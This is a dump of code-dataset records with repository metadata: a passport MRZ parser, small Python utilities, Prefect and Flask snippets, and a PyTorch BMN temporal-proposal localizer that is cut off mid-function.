115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
"""
Created on 03/01/2021
file: mrz_parser.py
description:
@author: Almoutaz
"""
class cardType():
nocard = -1
card_0 = 0
card_1 = 1
card_2 = 2
card_3 = 3
card_4 = 4
def sub_string(line, start, end):
sub_line = line[start: end]
sub_line = sub_line.replace('<', '')
return sub_line
def sub_string_with_space_replace(line, start, end):
sub_line = line[start: end]
sub_line = sub_line.replace('<', ' ')
return sub_line
def sub_string_without_replace(line, start, end):
sub_line = line[start: end]
return sub_line
class mrzParser():
def __init__(self, lines):
self.lines = lines
self.passportType = ""
self.countryCode = ""
self.surname = ""
self.givenname = ""
self.passportNumber = ""
self.passportChecksum = ""
self.nationality = ""
self.birthday = ""
self.birthdayChecksum = ""
self.sex = ""
self.expirationDate = ""
self.expirationChecksum = ""
self.personalNumber = ""
self.personalNumberChecksum = ""
self.secondRowChecksum = ""
self.optionalData = ""
self.optionalData2 = ""
self.hash1 = ""
self.hash2 = ""
self.hash3 = ""
self.hash4 = ""
self.final_hash = ""
def getCardType(self):
type = cardType.nocard
separated = self.lines.split('\r\n')
linecount = len(separated)
ch_num = len(separated[0])
first_ch = separated[0][0]
if linecount == 3 and ch_num == 30:
type = cardType.card_0
elif linecount == 2 and ch_num == 36:
if first_ch == "V" :
type == cardType.card_4
else:
type = cardType.card_1
elif linecount == 2 and ch_num == 44:
if first_ch == "V":
type = cardType.card_3
else:
type = cardType.card_2
return type
def analysisMRZ_0(self):
separated_lines = self.lines.split('\r\n')
# line 1
line_tmp = separated_lines[0]
# document type
self.passportType = sub_string(line_tmp, 0, 2)
# country
self.countryCode = sub_string(line_tmp, 2, 5)
# document num
self.passportNumber = sub_string(line_tmp, 5, 14)
# hash1
self.hash1 = sub_string(line_tmp, 14, 15)
# optional data
self.optionalData = sub_string(line_tmp, 15, 30)
# line 2
line_tmp = separated_lines[1]
# date of birth
self.birthday = sub_string(line_tmp, 0, 2) + '/' + sub_string(line_tmp, 2, 4) + '/' + sub_string(line_tmp, 4, 6)
# hash2
self.hash2 = sub_string(line_tmp, 6, 7)
# gender
self.sex = sub_string(line_tmp, 7, 8)
# expire date
self.expirationDate = sub_string(line_tmp, 8, 10) + '/' + sub_string(line_tmp, 10, 12) + '/' + sub_string( line_tmp, 12, 14)
# hash3
self.hash3 = sub_string(line_tmp, 14, 15)
# nationality
self.nationality = sub_string(line_tmp, 15, 18)
# optional data 2
self.optionalData2 = sub_string(line_tmp, 18, 29)
# final hash
self.final_hash = sub_string(line_tmp, 29, 30)
# line 3
line_tmp = separated_lines[2]
sept_names = line_tmp.split('<<')
if len(sept_names) >= 2:
# last name
self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
# given name
self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
else:
# last name
self.surname = ""
# given name
self.givenname = sub_string(line_tmp, 0, 30)
return
def analysisMRZ_1(self):
separated_lines = self.lines.split('\r\n')
# line 1
line_tmp = separated_lines[0]
# document type
self.passportType = sub_string(line_tmp, 0, 2)
# country
self.countryCode = sub_string(line_tmp, 2, 5)
name_line = sub_string_without_replace(line_tmp, 5, 36)
sept_names = name_line.split('<<')
if len(sept_names) >= 2:
# last name
self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
# given name
self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
else:
# last name
self.surname = ""
# given name
self.givenname = sub_string(line_tmp, 5, 36)
# line 2
line_tmp = separated_lines[1]
# document num
self.passportNumber = sub_string(line_tmp, 0, 9)
# hash1
self.hash1 = sub_string(line_tmp, 9, 10)
# nationality
self.nationality = sub_string(line_tmp, 10, 13)
# date of birth
self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
17, 19)
# hash2
self.hash2 = sub_string(line_tmp, 19, 20)
# gender
self.sex = sub_string(line_tmp, 20, 21)
# expire date
self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
line_tmp, 25, 27)
# hash3
self.hash3 = sub_string(line_tmp, 27, 28)
# optional data
self.optionalData = sub_string(line_tmp, 28, 35)
# final hash
self.final_hash = sub_string(line_tmp, 35, 36)
return
def analysisMRZ_2(self):
separated_lines = self.lines.split('\r\n')
# line 1
line_tmp = separated_lines[0]
# document type
self.passportType = sub_string(line_tmp, 0, 2)
# country
self.countryCode = sub_string(line_tmp, 2, 5)
name_line = sub_string_without_replace(line_tmp, 5, 44)
sept_names = name_line.split('<<')
if len(sept_names) >= 2:
# last name
self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
# given name
self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
else:
# last name
self.surname = ""
# given name
self.givenname = sub_string(line_tmp, 5, 44)
# line 2
line_tmp = separated_lines[1]
# document num
self.passportNumber = sub_string(line_tmp, 0, 9)
# hash1
self.hash1 = sub_string(line_tmp, 9, 10)
# nationality
self.nationality = sub_string(line_tmp, 10, 13)
# date of birth
self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp, 17, 19)
# hash2
self.hash2 = sub_string(line_tmp, 19, 20)
# gender
self.sex = sub_string(line_tmp, 20, 21)
# expire date
self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(line_tmp, 25, 27)
# hash3
self.hash3 = sub_string(line_tmp, 27, 28)
# personal number
self.personalNumber = sub_string(line_tmp, 28, 42)
# hash4
self.hash4 = sub_string(line_tmp, 42, 43)
# final hash
self.final_hash = sub_string(line_tmp, 43, 44)
return
def analysisMRZ_3(self):
separated_lines = self.lines.split('\r\n')
# line 1
line_tmp = separated_lines[0]
# document type
self.passportType = sub_string(line_tmp, 0, 2)
# country
self.countryCode = sub_string(line_tmp, 2, 5)
name_line = sub_string_without_replace(line_tmp, 5, 44)
sept_names = name_line.split('<<')
if len(sept_names) >= 2:
# last name
self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
# given name
self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
else:
# last name
self.surname = ""
# given name
self.givenname = sub_string(line_tmp, 5, 44)
# line 2
line_tmp = separated_lines[1]
# document num
self.passportNumber = sub_string(line_tmp, 0, 9)
# hash1
self.hash1 = sub_string(line_tmp, 9, 10)
# nationality
self.nationality = sub_string(line_tmp, 10, 13)
# date of birth
self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
17, 19)
# hash2
self.hash2 = sub_string(line_tmp, 19, 20)
# gender
self.sex = sub_string(line_tmp, 20, 21)
# expire date
self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
line_tmp, 25, 27)
# hash3
self.hash3 = sub_string(line_tmp, 27, 28)
# optional data
self.optionalData = sub_string(line_tmp, 28, 44)
return
def analysisMRZ_4(self):
separated_lines = self.lines.split('\r\n')
# line 1
line_tmp = separated_lines[0]
# document type
self.passportType = sub_string(line_tmp, 0, 2)
# country
self.countryCode = sub_string(line_tmp, 2, 5)
name_line = sub_string_without_replace(line_tmp, 5, 36)
sept_names = name_line.split('<<')
if len(sept_names) >= 2:
# last name
self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
# given name
self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
else:
# last name
self.surname = ""
# given name
self.givenname = sub_string(line_tmp, 5, 36)
# line 2
line_tmp = separated_lines[1]
# document num
self.passportNumber = sub_string(line_tmp, 0, 9)
# hash1
self.hash1 = sub_string(line_tmp, 9, 10)
# nationality
self.nationality = sub_string(line_tmp, 10, 13)
# date of birth
self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
17, 19)
# hash2
self.hash2 = sub_string(line_tmp, 19, 20)
# gender
self.sex = sub_string(line_tmp, 20, 21)
# expire date
self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
line_tmp, 25, 27)
# hash3
self.hash3 = sub_string(line_tmp, 27, 28)
# optional data
self.optionalData = sub_string(line_tmp, 28, 36)
return
def process(self):
type = self.getCardType()
if type == cardType.card_0:
self.analysisMRZ_0()
elif type == cardType.card_1:
self.analysisMRZ_1()
elif type == cardType.card_2:
self.analysisMRZ_2()
elif type == cardType.card_3:
self.analysisMRZ_3()
elif type == cardType.card_4:
self.analysisMRZ_4()
else:
return "error"
| 34.005831
| 132
| 0.55024
| 1,439
| 11,664
| 4.216122
| 0.084086
| 0.15131
| 0.184276
| 0.224164
| 0.789023
| 0.774023
| 0.765123
| 0.725565
| 0.703643
| 0.671007
| 0
| 0.058601
| 0.34165
| 11,664
| 343
| 133
| 34.005831
| 0.731475
| 0.084791
| 0
| 0.565217
| 0
| 0
| 0.00605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05314
| false
| 0.062802
| 0
| 0
| 0.140097
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
cf590a505947375a929427c3c8b53bf33126ffb9
| 193
|
py
|
Python
|
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
def update_lr(train_loss_history_var, config_var, train_loss_var):
return (len(train_loss_history_var) > 1) and (train_loss_history_var[-2] * config_var.lr_decay_threshold < train_loss_var)
| 96.5
| 126
| 0.818653
| 33
| 193
| 4.242424
| 0.454545
| 0.321429
| 0.342857
| 0.407143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011364
| 0.088083
| 193
| 2
| 126
| 96.5
| 0.784091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d858221ec33cc60c16f674b623f3d6675c432bfa
| 91
|
py
|
Python
|
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 5
|
2021-06-25T16:44:38.000Z
|
2021-12-31T01:29:00.000Z
|
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | null | null | null |
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 1
|
2021-06-25T20:33:47.000Z
|
2021-06-25T20:33:47.000Z
|
from .baseagent import BaseAgent
import numpy as np
class AgentRefo(BaseAgent):
pass
| 13
| 32
| 0.769231
| 12
| 91
| 5.833333
| 0.75
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 91
| 6
| 33
| 15.166667
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2b13f715a5fda0c6aa55f4dd0e1e2445b98c6bf3
| 175
|
py
|
Python
|
src/prefect/engine/executors/__init__.py
|
concreted/prefect
|
dd732f5990ee2b0f3d816adb285168fd63b239e4
|
[
"Apache-2.0"
] | 8,633
|
2019-03-23T17:51:03.000Z
|
2022-03-31T22:17:42.000Z
|
src/prefect/engine/executors/__init__.py
|
concreted/prefect
|
dd732f5990ee2b0f3d816adb285168fd63b239e4
|
[
"Apache-2.0"
] | 3,903
|
2019-03-23T19:11:21.000Z
|
2022-03-31T23:21:23.000Z
|
src/prefect/engine/executors/__init__.py
|
ngriffiths13/prefect
|
7f5613abcb182494b7dc12159277c3bc5f3c9898
|
[
"Apache-2.0"
] | 937
|
2019-03-23T18:49:44.000Z
|
2022-03-31T21:45:13.000Z
|
from prefect.executors.base import Executor
from prefect.engine.executors.dask import DaskExecutor, LocalDaskExecutor
from prefect.engine.executors.local import LocalExecutor
| 43.75
| 73
| 0.874286
| 21
| 175
| 7.285714
| 0.571429
| 0.215686
| 0.222222
| 0.339869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074286
| 175
| 3
| 74
| 58.333333
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2b295d39678ae0a6c3b95c1e322e08e416274ae5
| 169
|
py
|
Python
|
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
from rrd import app
from flask import render_template
@app.route("/thirdparty/grafana")
def grafana():
return render_template("thirdparty/grafana.html", **locals())
| 28.166667
| 65
| 0.763314
| 22
| 169
| 5.772727
| 0.636364
| 0.220472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 6
| 65
| 28.166667
| 0.84106
| 0
| 0
| 0
| 0
| 0
| 0.247059
| 0.135294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2b7a58b49285a971516873a7adda499e24225a53
| 169
|
py
|
Python
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 42
|
2019-10-14T11:30:53.000Z
|
2022-03-28T06:55:20.000Z
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 8
|
2019-10-13T02:54:19.000Z
|
2021-10-02T17:47:40.000Z
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 8
|
2019-09-23T18:59:39.000Z
|
2022-02-25T22:38:44.000Z
|
from validate_version_code import validate_version_code
from pygifsicle.__version__ import __version__
def test_version():
assert validate_version_code(__version__)
| 33.8
| 55
| 0.869822
| 21
| 169
| 6.095238
| 0.428571
| 0.351563
| 0.445313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094675
| 169
| 5
| 56
| 33.8
| 0.836601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9926096741d2447b9486d65b44e43d2d505d749a
| 46,671
|
py
|
Python
|
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
import math
import numpy as np
import torch
import torch.nn as nn
from ...localization import temporal_iop, temporal_iou
from ..builder import LOCALIZERS, build_loss
from .base import BaseLocalizer
from .utils import post_processing
from rich import print
import transformers
from transformers import AutoModel
from transformers import AutoTokenizer, AutoConfig
from collections import OrderedDict
import os
import copy
@LOCALIZERS.register_module()
class BMN(BaseLocalizer):
"""Boundary Matching Network for temporal action proposal generation.
Please refer `BMN: Boundary-Matching Network for Temporal Action Proposal
Generation <https://arxiv.org/abs/1907.09702>`_.
Code Reference https://github.com/JJBOY/BMN-Boundary-Matching-Network
Args:
temporal_dim (int): Total frames selected for each video.
boundary_ratio (float): Ratio for determining video boundaries.
num_samples (int): Number of samples for each proposal.
num_samples_per_bin (int): Number of bin samples for each sample.
feat_dim (int): Feature dimension.
soft_nms_alpha (float): Soft NMS alpha.
soft_nms_low_threshold (float): Soft NMS low threshold.
soft_nms_high_threshold (float): Soft NMS high threshold.
post_process_top_k (int): Top k proposals in post process.
feature_extraction_interval (int):
Interval used in feature extraction. Default: 16.
loss_cls (dict): Config for building loss.
Default: ``dict(type='BMNLoss')``.
hidden_dim_1d (int): Hidden dim for 1d conv. Default: 256.
hidden_dim_2d (int): Hidden dim for 2d conv. Default: 128.
hidden_dim_3d (int): Hidden dim for 3d conv. Default: 512.
"""
def __init__(self,
temporal_dim,
boundary_ratio,
num_samples,
num_samples_per_bin,
feat_dim,
soft_nms_alpha,
soft_nms_low_threshold,
soft_nms_high_threshold,
post_process_top_k,
feature_extraction_interval=16,
loss_cls=dict(type='BMNLoss'),
hidden_dim_1d=256,
hidden_dim_2d=128,
hidden_dim_3d=512):
super(BaseLocalizer, self).__init__()
self.tscale = temporal_dim
self.boundary_ratio = boundary_ratio
self.num_samples = num_samples
self.num_samples_per_bin = num_samples_per_bin
self.feat_dim = feat_dim
self.soft_nms_alpha = soft_nms_alpha
self.soft_nms_low_threshold = soft_nms_low_threshold
self.soft_nms_high_threshold = soft_nms_high_threshold
self.post_process_top_k = post_process_top_k
self.feature_extraction_interval = feature_extraction_interval
self.loss_cls = build_loss(loss_cls)
self.hidden_dim_1d = hidden_dim_1d
self.hidden_dim_2d = hidden_dim_2d
self.hidden_dim_3d = hidden_dim_3d
self._get_interp1d_mask()
# Base Module
self.x_1d_b = nn.Sequential(
nn.Conv1d(
self.feat_dim,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True))
# Temporal Evaluation Module
self.x_1d_s = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
self.x_1d_e = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
# Proposal Evaluation Module
self.x_1d_p = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True))
self.x_3d_p = nn.Sequential(
nn.Conv3d(
self.hidden_dim_1d,
self.hidden_dim_3d,
kernel_size=(self.num_samples, 1, 1)), nn.ReLU(inplace=True))
self.x_2d_p = nn.Sequential(
nn.Conv2d(self.hidden_dim_3d, self.hidden_dim_2d, kernel_size=1),
nn.ReLU(inplace=True),
nn.Conv2d(
self.hidden_dim_2d,
self.hidden_dim_2d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True),
nn.Conv2d(
self.hidden_dim_2d,
self.hidden_dim_2d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True),
nn.Conv2d(self.hidden_dim_2d, 2, kernel_size=1), nn.Sigmoid())
self.anchors_tmins, self.anchors_tmaxs = self._temporal_anchors(
-0.5, 1.5)
self.match_map = self._match_map()
self.bm_mask = self._get_bm_mask()
def _match_map(self):
"""Generate match map."""
temporal_gap = 1. / self.tscale
match_map = []
for idx in range(self.tscale):
match_window = []
tmin = temporal_gap * idx
for jdx in range(1, self.tscale + 1):
tmax = tmin + temporal_gap * jdx
match_window.append([tmin, tmax])
match_map.append(match_window)
match_map = np.array(match_map)
match_map = np.transpose(match_map, [1, 0, 2])
match_map = np.reshape(match_map, [-1, 2])
return match_map
def _temporal_anchors(self, tmin_offset=0., tmax_offset=1.):
"""Generate temporal anchors.
Args:
tmin_offset (int): Offset for the minimum value of temporal anchor.
Default: 0.
tmax_offset (int): Offset for the maximun value of temporal anchor.
Default: 1.
Returns:
tuple[Sequence[float]]: The minimum and maximum values of temporal
anchors.
"""
temporal_gap = 1. / self.tscale
anchors_tmins = []
anchors_tmaxs = []
for i in range(self.tscale):
anchors_tmins.append(temporal_gap * (i + tmin_offset))
anchors_tmaxs.append(temporal_gap * (i + tmax_offset))
return anchors_tmins, anchors_tmaxs
def _forward(self, x):
"""Define the computation performed at every call.
Args:
x (torch.Tensor): The input data.
Returns:
torch.Tensor: The output of the module.
"""
# x.shape [batch_size, self.feat_dim, self.tscale]
base_feature = self.x_1d_b(x)
# base_feature.shape [batch_size, self.hidden_dim_1d, self.tscale]
start = self.x_1d_s(base_feature).squeeze(1)
# start.shape [batch_size, self.tscale]
end = self.x_1d_e(base_feature).squeeze(1)
# end.shape [batch_size, self.tscale]
confidence_map = self.x_1d_p(base_feature)
# [batch_size, self.hidden_dim_1d, self.tscale]
confidence_map = self._boundary_matching_layer(confidence_map)
# [batch_size, self.hidden_dim_1d,, self.num_sampls, self.tscale, self.tscale] # noqa
confidence_map = self.x_3d_p(confidence_map).squeeze(2)
# [batch_size, self.hidden_dim_3d, self.tscale, self.tscale]
confidence_map = self.x_2d_p(confidence_map)
# [batch_size, 2, self.tscale, self.tscale]
return confidence_map, start, end
def _boundary_matching_layer(self, x):
"""Generate matching layer."""
input_size = x.size()
out = torch.matmul(x,
self.sample_mask).reshape(input_size[0],
input_size[1],
self.num_samples,
self.tscale, self.tscale)
return out
def forward_test(self, raw_feature, video_meta):
"""Define the computation performed at every call when testing."""
confidence_map, start, end = self._forward(raw_feature)
start_scores = start[0].cpu().numpy()
end_scores = end[0].cpu().numpy()
cls_confidence = (confidence_map[0][1]).cpu().numpy()
reg_confidence = (confidence_map[0][0]).cpu().numpy()
max_start = max(start_scores)
max_end = max(end_scores)
# generate the set of start points and end points
start_bins = np.zeros(len(start_scores))
start_bins[0] = 1 # [1,0,0...,0,0]
end_bins = np.zeros(len(end_scores))
end_bins[-1] = 1 # [0,0,0...,0,1]
for idx in range(1, self.tscale - 1):
if start_scores[idx] > start_scores[
idx + 1] and start_scores[idx] > start_scores[idx - 1]:
start_bins[idx] = 1
elif start_scores[idx] > (0.5 * max_start):
start_bins[idx] = 1
if end_scores[idx] > end_scores[
idx + 1] and end_scores[idx] > end_scores[idx - 1]:
end_bins[idx] = 1
elif end_scores[idx] > (0.5 * max_end):
end_bins[idx] = 1
# iterate through all combinations of start_index and end_index
new_proposals = []
for idx in range(self.tscale):
for jdx in range(self.tscale):
start_index = jdx
end_index = start_index + idx + 1
if end_index < self.tscale and start_bins[
start_index] == 1 and end_bins[end_index] == 1:
tmin = start_index / self.tscale
tmax = end_index / self.tscale
tmin_score = start_scores[start_index]
tmax_score = end_scores[end_index]
cls_score = cls_confidence[idx, jdx]
reg_score = reg_confidence[idx, jdx]
score = tmin_score * tmax_score * cls_score * reg_score
new_proposals.append([
tmin, tmax, tmin_score, tmax_score, cls_score,
reg_score, score
])
new_proposals = np.stack(new_proposals)
video_info = dict(video_meta[0])
proposal_list = post_processing(new_proposals, video_info,
self.soft_nms_alpha,
self.soft_nms_low_threshold,
self.soft_nms_high_threshold,
self.post_process_top_k,
self.feature_extraction_interval)
output = [
dict(
video_name=video_info['video_name'],
proposal_list=proposal_list)
]
return output
def forward_train(self, raw_feature, label_confidence, label_start,
label_end):
"""Define the computation performed at every call when training."""
confidence_map, start, end = self._forward(raw_feature)
loss = self.loss_cls(confidence_map, start, end, label_confidence,
label_start, label_end,
self.bm_mask.to(raw_feature.device))
loss_dict = dict(loss=loss[0])
return loss_dict
def generate_labels(self, gt_bbox):
"""Generate training labels."""
match_score_confidence_list = []
match_score_start_list = []
match_score_end_list = []
for every_gt_bbox in gt_bbox:
gt_iou_map = []
for start, end in every_gt_bbox:
if isinstance(start, torch.Tensor):
start = start.numpy()
if isinstance(end, torch.Tensor):
end = end.numpy()
current_gt_iou_map = temporal_iou(self.match_map[:, 0],
self.match_map[:, 1], start,
end)
current_gt_iou_map = np.reshape(current_gt_iou_map,
[self.tscale, self.tscale])
gt_iou_map.append(current_gt_iou_map)
gt_iou_map = np.array(gt_iou_map).astype(np.float32)
gt_iou_map = np.max(gt_iou_map, axis=0)
gt_tmins = every_gt_bbox[:, 0]
gt_tmaxs = every_gt_bbox[:, 1]
gt_len_pad = 3 * (1. / self.tscale)
gt_start_bboxs = np.stack(
(gt_tmins - gt_len_pad / 2, gt_tmins + gt_len_pad / 2), axis=1)
gt_end_bboxs = np.stack(
(gt_tmaxs - gt_len_pad / 2, gt_tmaxs + gt_len_pad / 2), axis=1)
match_score_start = []
match_score_end = []
for anchor_tmin, anchor_tmax in zip(self.anchors_tmins,
self.anchors_tmaxs):
match_score_start.append(
np.max(
temporal_iop(anchor_tmin, anchor_tmax,
gt_start_bboxs[:, 0], gt_start_bboxs[:,
1])))
match_score_end.append(
np.max(
temporal_iop(anchor_tmin, anchor_tmax,
gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
match_score_confidence_list.append(gt_iou_map)
match_score_start_list.append(match_score_start)
match_score_end_list.append(match_score_end)
match_score_confidence_list = torch.Tensor(match_score_confidence_list)
match_score_start_list = torch.Tensor(match_score_start_list)
match_score_end_list = torch.Tensor(match_score_end_list)
return (match_score_confidence_list, match_score_start_list,
match_score_end_list)
def forward(self,
raw_feature,
gt_bbox=None,
video_meta=None,
return_loss=True):
"""Define the computation performed at every call."""
if return_loss:
label_confidence, label_start, label_end = (
self.generate_labels(gt_bbox))
device = raw_feature.device
label_confidence = label_confidence.to(device)
label_start = label_start.to(device)
label_end = label_end.to(device)
return self.forward_train(raw_feature, label_confidence,
label_start, label_end)
return self.forward_test(raw_feature, video_meta)
@staticmethod
def _get_interp1d_bin_mask(seg_tmin, seg_tmax, tscale, num_samples,
num_samples_per_bin):
"""Generate sample mask for a boundary-matching pair."""
plen = float(seg_tmax - seg_tmin)
plen_sample = plen / (num_samples * num_samples_per_bin - 1.0)
total_samples = [
seg_tmin + plen_sample * i
for i in range(num_samples * num_samples_per_bin)
]
p_mask = []
for idx in range(num_samples):
bin_samples = total_samples[idx * num_samples_per_bin:(idx + 1) *
num_samples_per_bin]
bin_vector = np.zeros(tscale)
for sample in bin_samples:
sample_upper = math.ceil(sample)
sample_decimal, sample_down = math.modf(sample)
if 0 <= int(sample_down) <= (tscale - 1):
bin_vector[int(sample_down)] += 1 - sample_decimal
if 0 <= int(sample_upper) <= (tscale - 1):
bin_vector[int(sample_upper)] += sample_decimal
bin_vector = 1.0 / num_samples_per_bin * bin_vector
p_mask.append(bin_vector)
p_mask = np.stack(p_mask, axis=1)
return p_mask
def _get_interp1d_mask(self):
"""Generate sample mask for each point in Boundary-Matching Map."""
mask_mat = []
for start_index in range(self.tscale):
mask_mat_vector = []
for duration_index in range(self.tscale):
if start_index + duration_index < self.tscale:
p_tmin = start_index
p_tmax = start_index + duration_index
center_len = float(p_tmax - p_tmin) + 1
